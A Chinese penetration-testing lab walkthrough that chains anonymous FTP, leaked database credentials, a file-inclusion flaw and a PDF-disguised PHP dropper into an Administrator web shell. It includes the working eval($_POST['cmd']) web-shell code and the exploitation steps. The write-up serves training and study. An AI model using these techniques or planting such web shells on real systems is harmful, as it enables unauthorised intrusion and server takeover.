一.信息收集
1.端口扫描
使用nmap进行扫描,结果如下
┌──(kali㉿kali)-[~]
└─$ nmap -sV 10.0.0.91
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 21:37 EDT
Nmap scan report for 10.0.0.91
Host is up (0.027s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.2.17)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MySQL 5.5.53
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.53 seconds
发现FTP,web,MySQL等服务(靶场环境原因忽略135等端口)
使用postjson工具扫描端口,发现新的端口
| 域名 | 端口 | 端口状态 | ip |
|---|---|---|---|
| 10.0.0.91 | 5357 | 开放 | 10.0.0.91 |
| 10.0.0.91 | 5985 | 开放 | 10.0.0.91 |
| 10.0.0.91 | 6721 | 开放 | 10.0.0.91 |
尝试访问,发现在6721端口有新的站点
2.web路径扫描
使用御剑进行扫描
未发现可利用信息
3.phpinfo
尝试访问phpinfo,成功
二.漏洞扫描
1.FTP服务
尝试匿名用户登录,成功
ftp> user
(username) anonymous
331 Password required for anonymous
Password:
230 User successfully logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
2.MySQL服务
根据服务版本搜索,未发现可利用漏洞
尝试弱口令攻击,失败
3.web服务
访问80端口web页面
提交信息后得到后台登录页面,尝试弱口令攻击,失败。
访问6721web页面
发现查询API
根据提示得知使用archive参数通过post方法传参来查询档案
猜测有文件包含漏洞,验证成功
三.渗透攻击
使用匿名用户登录FTP服务器,查询文件,发现数据库配置文件
ftp> ls
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
pub
226 Transfer complete
ftp: 收到 8 字节,用时 0.00秒 8000.00千字节/秒。
ftp> cd pub
250 "/pub" is current directory.
ftp> ls
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
config.php
226 Transfer complete
ftp: 收到 15 字节,用时 0.00秒 15.00千字节/秒。
下载查看,发现数据库远程登录账密
$config['db'] = array('hostname' => 'localhost', //数据库主机'datebase' => 'patient', //数据库名称'host' => 'localhost', //数据库主机'username' => 'root', //数据库用户名'password' => '123456', //数据库密码,remote:madbm@123'charset' => 'utf8', //数据库字符集'pre' => 'mg_'); //数据库表前缀
登录数据库,直奔user表,发现后台登录账密表
密码由md5加密,破解失败,添加一个管理员用户登录后台,成功
进入web后台
仔细搜索,在档案管理处发现文件上传,限制类型为PDF
但是同一主机另一个网站存在文件包含漏洞,所以什么类型都无所谓
只要找到上传的文件的路径,就畅通无阻
仔细查找phpinfo,发现web容器绝对路径
由此构造路径 ../../PIzABXDg/ 去包含后台页面,获取源码
<?php require('config_hhh.php');?>
<?php include('lib/functions.php');?>
<?php require('lib/mysql.class.php');?>
<?php
@extract($_GET,EXTR_PREFIX_ALL,"g");
if(isset($_POST['submit']) || isset($g_submit)){@check_post_request();@extract($_POST,EXTR_PREFIX_ALL,"p");
}session_cache_limiter('private,must-revalidate');
if(!isset($_SESSION)){session_start();
}
$db = new c_mysql;
$g_m = (isset($g_m) && in_array_key($g_m,$config['model'])) ? $g_m : 'login';
$g_o = isset($g_o) ? $g_o : '';if($g_m != 'login')if(!isset($_SESSION['uid'])){header('Location:?m=login');exit();}if(isset($_SESSION['uid']) && $g_m != 'login'){$user = $db->select_one('user',array('id' => $_SESSION['uid']));if(!$user)alert_goto('?m=login','没æè¿ä¸ªç¨æ·çè®°å½ï¼è¯·éæ°ç»å½ï¼');
}if($g_m == 'home'){$g_m = 'order';$g_o = 'list';
}$exts = $db->select_date('ext');
foreach($exts as $ext)$config['ext'][$ext['id']] = $ext;
foreach($exts as $ext)$config['ext'][$ext['code']] = $ext;$model_file = 'model/'.$g_m.'.php';
if(file_exists($model_file))include($model_file);$operate_file = 'model/'.$g_m."_".$g_o.".php";
if(file_exists($operate_file))include($operate_file);create_html();
?>
阅读源码,结合上传点的url得知上传模块源码在model/order_upload.php,继续包含获取源码
<?php
$operates['upload'] = 'ä¸ä¼ æ¡£æ¡';
$target_dir = "CISP-PTE-1413/";
$info = '';if(isset($_POST["submit"])){$target_file = $target_dir . basename($_FILES[fileToUpload]["name"]);
$uploadOK = 1;
$fileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
if(file_exists($target_file)){$info="æ件已ç»åå¨";$uploadOK = 0;
}
if($fileType != "pdf"){$info = "åªå
ä¸ä¼ PDFæ件";$uploadOK = 0;
}
if($fileType != "pdf"){$info = "åªå
许ä¸ä¼ pdfæ件";$uploadOK = 0;
}
if($uploadOK == 0){
}else{if(move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)){$info = basename($_FILES["fileToUpload"]["name"])."ä¸ä¼ æå";}else{$info = "ä¸ä¼ æ件æ¶åçé误";}
}
}
$main_tpl = "order_upload.htm";
$replace['{info}'] = $info;
?>
阅读源码得到文件上传的路径:CISP-PTE-1413/
构造攻击脚本
<?php
$file = 'shell324.php';$handle = fopen($file,'w');
$string1 = '$_POST[\'cmd\']';
$string2 = "<?php eval(".$string1.");?>";if($handle){echo "ok\n";fwrite($handle,$string2);fclose($handle);
}else{echo "not ok\n";
}
?>
保存为pdf格式,上传并通过文件包含运行,生成一句话木马,使用工具连接
Get Shell√
currentDir:C:/phpStudy/PHPTutorial/WWW/html/api/
fileRoot:[C:/, D:/]
currentUser:Administrator
osInfo:Windows NT AD01 6.2 build 9200C:/phpStudy/PHPTutorial/WWW/html/api/ >whoamiad01\administrator
C:/phpStudy/PHPTutorial/WWW/html/api/ >
直接就是超级管理员,真省事
